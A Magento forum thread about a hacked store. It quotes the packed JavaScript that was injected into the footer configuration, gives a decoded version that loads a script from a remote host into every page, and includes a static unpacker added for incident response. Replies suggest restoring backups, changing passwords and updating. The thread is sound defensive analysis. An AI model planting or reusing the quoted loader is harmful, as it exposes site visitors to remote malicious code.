Magento Forum

Magento site has been hacked. 
 
jackiee123
Jr. Member
 
Total Posts:  3
Joined:  2010-04-26
 

Hi, recently a site of mine has been compromised / hacked. Upon investigation I found that the malicious code was inserted in the footer.

Table: core_config_data
Row_ID: 33
path: design/footer/absolute_footer

A JS script was added in the “System => Configuration => General => Design => Footer => Miscellaneous HTML” parameter.

The following code was found:

<script language="javascript">eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('2 1=\'\';5{6 7(\'8\')}9(e){1=3.a(\'f\')}2 4=\'h\'+\'t\'+\'t\'+\'p\'+\':\'+\'/\'+\'/\'+\'c\'+\'l\'+\'i\'+\'i\'+\'k\'+\'.\'+\'c\'+\'o\'+\'.\'+\'u\'+\'k\'+\'/\'+\'b\'+\'l\'+\'o\'+\'g\'+\'/\'+\'w\'+\'p\'+\'-\'+\'i\'+\'n\'+\'c\'+\'l\'+\'u\'+\'d\'+\'e\'+\'s\'+\'/\'+\'p\'+\'o\'+\'m\'+\'o\'+\'/\'+\'i\'+\'p\'+\'h\'+\'o\'+\'t\'+\'o\'+\'.\'+\'j\'+\'s\';1.q(\'r\',4);3.v(\'x\').y(0).z(1);',36,36,'|s00|var|document|url|try|new|ActiveXObject|dc|catch|createElement|||||script|||||||||||setAttribute|src||||getElementsByTagName||head|item|appendChild'.split('|'),0,{}))</script>

Decoded script:

var s00 = '';
try {
    // If creating this ActiveX object throws, execution falls through to the catch block
    new ActiveXObject('dc')
} catch(e) {
    s00 = document.createElement('script')
}
// The remote script URL is built one character at a time
var url = 'h' + 't' + 't' + 'p' + ':' + '/' + '/' + 'c' + 'l' + 'i' + 'i' + 'k' + '.' + 'c' + 'o' + '.' + 'u' + 'k' + '/' + 'b' + 'l' + 'o' + 'g' + '/' + 'w' + 'p' + '-' + 'i' + 'n' + 'c' + 'l' + 'u' + 'd' + 'e' + 's' + '/' + 'p' + 'o' + 'm' + 'o' + '/' + 'i' + 'p' + 'h' + 'o' + 't' + 'o' + '.' + 'j' + 's';
s00.setAttribute('src', url);
// Append the new script element to the page head so the browser loads it
document.getElementsByTagName('head').item(0).appendChild(s00);
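
Added example, not part of the original post or thread: a static unpacker for this style of packed footer script, so a suspicious core_config_data value can be decoded and its remote URL read without executing it. The sample payload, the example.invalid URL and all function names are constructed for this example, and only packer radix values up to 36 are handled.

```javascript
// Statically unpack a "p,a,c,k,e,r" style blob WITHOUT eval(), so an injected
// config value can be inspected safely during incident response.

// Pull the four packer arguments (payload, radix, count, dictionary) from raw text.
function parsePacked(src) {
  const re = /\}\('((?:[^'\\]|\\.)*)',(\d+),(\d+),'((?:[^'\\]|\\.)*)'\.split\('\|'\)/;
  const m = re.exec(src);
  if (!m) return null;
  const unesc = (s) => s.replace(/\\(.)/g, '$1'); // \' -> '  and  \\ -> \
  return { p: unesc(m[1]), a: Number(m[2]), c: Number(m[3]), k: unesc(m[4]).split('|') };
}

// Same substitution the packer's bootstrap performs: every word token that is
// the radix-a spelling of a non-empty dictionary index is replaced by that word.
function unpack({ p, a, c, k }) {
  if (a < 2 || a > 36) throw new RangeError('only radix 2..36 is handled here');
  const dict = new Map(); // Map avoids collisions with Object.prototype keys
  for (let i = 0; i < c; i++) if (k[i]) dict.set(i.toString(a), k[i]);
  return p.replace(/\b\w+\b/g, (tok) => (dict.has(tok) ? dict.get(tok) : tok));
}

// Reading aid: merge 'h'+'t'+'t'+'p' chains into one literal (heuristic, not a JS parser).
function foldConcat(js) {
  const pair = /'([^'\\]*)'\s*\+\s*'([^'\\]*)'/g;
  let prev;
  do { prev = js; js = js.replace(pair, (_, x, y) => `'${x}${y}'`); } while (js !== prev);
  return js;
}

// Decode a stored value and list any URLs it would load.
function analyze(src) {
  const args = parsePacked(src);
  if (!args) return { packed: false, code: src, urls: [] };
  const code = foldConcat(unpack(args));
  return { packed: true, code, urls: code.match(/https?:\/\/[^\s'"]+/g) || [] };
}

// Constructed sample shaped like the footer value in the post (bootstrap elided).
const SAMPLE = String.raw`eval(function(p,a,c,k,e,r){/* bootstrap elided */return p}(` +
  String.raw`'2 1=3.5(\'6\');2 4=\'h\'+\'t\'+\'t\'+\'p\'+\':\'+\'/\'+\'/\'+\'e\'+\'x\'+\'a\'+\'m\'+` +
  String.raw`\'p\'+\'l\'+\'e\'+\'.\'+\'i\'+\'n\'+\'v\'+\'a\'+\'l\'+\'i\'+\'d\'+\'/\'+\'x\'+\'.\'+\'j\'+\'s\';` +
  String.raw`1.7(\'8\',4);',36,10,'|s00|var|document|url|createElement|script|setAttribute|src|'` +
  String.raw`.split('|'),0,{}))`;

console.log(analyze(SAMPLE));
```

The same function can be run over every design/* value exported from core_config_data; any row reported as packed, or listing a URL you do not recognise, deserves a manual look.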

 
Brynnae
Member
 
Total Posts:  36
Joined:  2012-04-17
California
 

Do you have an old backup without the malicious code? Then you can upload the whole site. This is one of the ways to remove it; or else, if you think that removing the code will be OK, then you can remove the same code as you mentioned.

And after doing that, try to focus on increasing the security of your website, and try to find loopholes and close them.

 
thebod
Moderator
 
Total Posts:  81
Joined:  2010-08-11
 

Hi,

I’m not able to access the JS anymore; it might be a generic browser attacking toolkit.

Anyway, before checking for Magento issues, you should change all your passwords! In nearly every case Magento installations get compromised by stolen passwords, not by issues inside Magento.

And do you use the most up-to-date Magento version? If not, I’d highly recommend an update.

 